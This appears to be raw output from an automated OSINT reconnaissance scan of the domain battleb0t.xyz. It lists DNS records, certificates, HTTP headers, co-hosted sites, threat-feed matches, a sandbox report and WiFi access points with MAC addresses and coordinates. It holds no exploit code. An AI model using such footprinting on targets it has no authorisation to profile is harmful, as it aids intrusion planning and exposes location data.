| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | babacan (Net ID: 00:14:C1:20:84:74) | 40.2024, 29.0398 |
| 2023-05-12 03:10:11 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [104.21.0.0/20]
http://www.voipbl.org/update | 104.21.0.0/20 |
| 2023-05-12 03:01:32 | Web Server | No | Tool - WhatWeb | 0 | 0 | 3 | 0 | None | cloudflare | vscode.battleb0t.xyz |
| 2023-05-12 02:56:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.6.166 | www.ayhu.xyz |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitLab - GitLab Inc. is an open-core company that operates GitLab, a DevOps software package which can develop, secure, and operate software. The open source software project was created by Ukrainian developer Dmytro Zaporozhets and Dutch developer Sytse Sijbrandij. | battleb0t.github.io |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.67 | 34.74.170.74 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Chyoa (Category: XXXPORNXXX)
https://chyoa.com/user/login | login |
| 2023-05-12 02:44:23 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 25 02:39:25.268 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Feb 25 02:39:25.238 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:45:01 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.109.153 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.110.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:29:7A:3C) | 34.0544, -118.244 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 010916hao.github.io | 185.199.111.153 |
| 2023-05-12 02:54:16 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} | https://oldfluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:8C:21:A9) | 39.0469, -77.4903 |
| 2023-05-12 02:54:30 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 64.226.81.43 |
| 2023-05-12 03:43:45 | Malicious IP on Same Subnet | Yes | CleanTalk Spam List | 0 | 0 | 4 | 0 | None | CleanTalk Spam List [45.131.109.0/24]
https://iplists.firehol.org/files/cleantalk_7d.ipset | 45.131.109.0/24 |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Fastly CDN Fastly | www.battleb0t.xyz |
| 2023-05-12 02:53:32 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["E278:52F1:2384BF1:3304643:645CBD7D"], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683799422.885849,VS0,VE32"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["2755bc270974a8f69ac639a54e3259fa11be8083"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100155-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SBB (Net ID: 00:02:CF:A7:63:9D) | 40.2024, 29.0398 |
| 2023-05-12 02:54:23 | Linked URL - Internal | No | Web Spider | 5 | 0 | 4 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-tikaro.github.io | 185.199.111.153 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 185.199.110.153 | www.battleb0t.xyz |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 001viet.com | 001viet.com |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | taylor (Net ID: 00:06:25:9A:21:94) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:50 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 34.148.97.127 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/carti_3.JPG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.144): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:73) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | roxie (Net ID: 00:02:6F:E5:4F:4C) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:58 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.110.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet24CE (Net ID: 00:01:36:59:24:CC) | 37.7813933,-122.3918002 |
| 2023-05-12 02:51:59 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://acmephp.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_303"\n "IsoScope_ed8_IE_EarlyTabStart_0xdcc_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3800"\n "IsoScope_ed8_IESQMMUTEX_0_331"\n "IsoScope_ed8_ConnHashTable<3800>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"acmephp.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a href="https://twitter.com/acme_php">" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<i class="fa fa-twitter"></i>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<span>Follow on Twitter</span>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/acme_php">Twitter</a>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/titouangalopin">@tgalopin</a> and" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/jderusse">@jderusse</a>" (Indicator: "dir "; File: "786RITC2.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, 
u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ckdncxys\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet 
explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{cb6dd7e7-ed80-11ed-b43f-080027944a9e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "AvenirNextLTPro-Regular_1_.woff" has type "Web Open Font Format CFF length 38024 version 0.0"- [targetUID: N/A]\n "font-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003800]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF48E04C2C232F3230.TMP" has type "data"- Location: [%TEMP%\\~DF48E04C2C232F3230.TMP]- [targetUID: 00000000-00003800]\n "~DFF77628F7BF10B560.TMP" has type "data"- Location: [%TEMP%\\~DFF77628F7BF10B560.TMP]- [targetUID: 00000000-00003800]\n "~DF6EABB9BAE595B52D.TMP" has type "data"- Location: 
[%TEMP%\\~DF6EABB9BAE595B52D.TMP]- [targetUID: 00000000-00003800]\n "~DFDCBC4D5DBDF1DF3E.TMP" has type "data"- Location: [%TEMP%\\~DFDCBC4D5DBDF1DF3E.TMP]- [targetUID: 00000000-00003800]\n "urlref_httpsacmephp.github.io" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "fonts_1_.css" has type "ASCII text"- [targetUID: N/A]\n "app_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._CB6DD7E7-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_CB6DD7E9-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D2AD0B8A-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "SBXI2I91.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SBXI2I91.txt]- [targetUID: 00000000-00002844]\n "CPJIWZZK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CPJIWZZK.txt]- [targetUID: 00000000-00003800]\n "C8FKJFB2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C8FKJFB2.txt]- [targetUID: 00000000-00003800]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "D3WB1LDR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D3WB1LDR.txt]- [targetUID: 00000000-00002844]\n "YI9AAEHI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YI9AAEHI.txt]- [targetUID: 00000000-00003800]\n "N8OPXZSU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N8OPXZSU.txt]- [targetUID: 00000000-00003800]\n "8X4V8G7W.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8X4V8G7W.txt]- [targetUID: 00000000-00003800]\n "786RITC2.htm" has type "HTML 
document UTF-8 Unicode text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\786RITC2.htm]- [targetUID: 00000000-00002844]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'n | 185.199.108.153 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.242): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | shithead (Net ID: 00:0C:41:43:78:70) | 39.0469, -77.4903 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SINGER (Net ID: 00:00:71:90:09:29) | 41.8781, -87.6298 |
| 2023-05-12 02:45:34 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | skip.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | malsup.github.io |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | daphne.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [006blog.github.io]
https://www.openphish.com/feed.txt | 006blog.github.io |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.246): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | union church (Net ID: 00:00:C5:FE:88:4C) | 34.0544, -118.244 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | niudnav (Net ID: 00:0C:F6:63:91:4C) | 50.8897, 6.0563 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5d3adbfbad871d-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Host": ["87.248.157.102:2077"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Restricted Area\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | etherum-libs.github.io | 185.199.108.153 |
| 2023-05-12 03:25:08 | Internet Name | No | DNS Brute-forcer | 1 | 0 | 1 | 0 | None | vm.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent_g_router (Net ID: 00:14:5C:85:F6:6A) | 50.8897, 6.0563 |
| 2023-05-12 03:33:47 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif<br>sgssso<br><Qwm7<br>>6x.O<br>x>t7?<br>g$sy?<br>.b97<<br>/Ggy!<br>l/5-o<br>ggs43Z<br>x.o.n><br>NNEsz<br>gmuss<br>Mswy5<br>dIys6<br>>t6w6<br>03Ryr\G<br>a>0xM<br>g_on8<br>9!6sBsmms<br>?r:\t<br>L5M3O<br>nq_JxO<br>`uns?g<br>F1_?J<br>$vw3C<br>?.O:H<br>Gq$rMmo<br>0y7?i<br><?qgg<br>WYeyq$<br>!um_KM<br>ykmsrzz<br>?2Cm7<br>3>O0?<br>irIyo<br>t.Iof?y<br>R\y2I<br>tnt"3<br>!t5K?/<br>hfIoq'<br>bI>sy<br>w?f?f?<br><Aq"Cio<br>/uMbO<br>> Ige<br>>km7M<br>1$vw0<br>y.n/"<br>/uM>9<br>njKym<br>v:Ky$<br>ryw2Com<br>s<U?o<br>v?R.><br>hGydd<br>soyg'<br>:7Ieq<br>5zO-$<br>2pMsw<br>wGo$w?<w<br>:xssms<br>jVw:o<br>.?ygs<br>nn9?m<br>oO_n:<br>nFumS<br>W7ofc<br>U95 5<br>Gs\-?o<br>ry>f<<br>gae$w<br>?2kmO<br>sIyf/!<br>t8y<?<br>\Cwy1<br>_Bx_K<br>oeqq$<br>g5b9c<br>/2?.o/<br>hcg>o<br>kkkn?<br>/`0E'<br>xn/<a<br>uwosm<br>.<7qq<br>zdWqk<br>$1\Mm<br>rzW?'<br>tx<Iogss<br>ldU9?<br>K?.?/<br>r\isI<br>?6gAs<br>$Kxn<<br>nnnOS<br>qyooo<br>Hc<M?<br>Ej\Ioy'<br>x'8_a | https://pics.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:55:11 | Netblock Membership | No | Censys | 4 | 0 | 2 | 0 | None | 87.248.157.0/24 | 87.248.157.102 |
| 2023-05-12 02:54:41 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 104.196.16.0/20 | 104.196.30.220 |
| 2023-05-12 03:09:42 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 117.97.148.34.bc.googleusercontent.com | 34.148.97.117 |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-110-154.github.com]<br>http://vxvault.net/URL_List.php | cdn-185-199-110-154.github.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CATYLN (Net ID: 00:01:38:86:06:1F) | 37.780462,-122.390564 |
| 2023-05-12 02:53:22 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3037::6815:470e | nwapi2.battleb0t.xyz |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2600:1f18:2489:8202::c8 | funny.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | redskins33 (Net ID: 00:09:5B:85:B7:B6) | 39.0469, -77.4903 |
| 2023-05-12 02:45:40 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | San Francisco (South Beach), California, 94107, United States, North America | 185.199.111.153 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.250): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
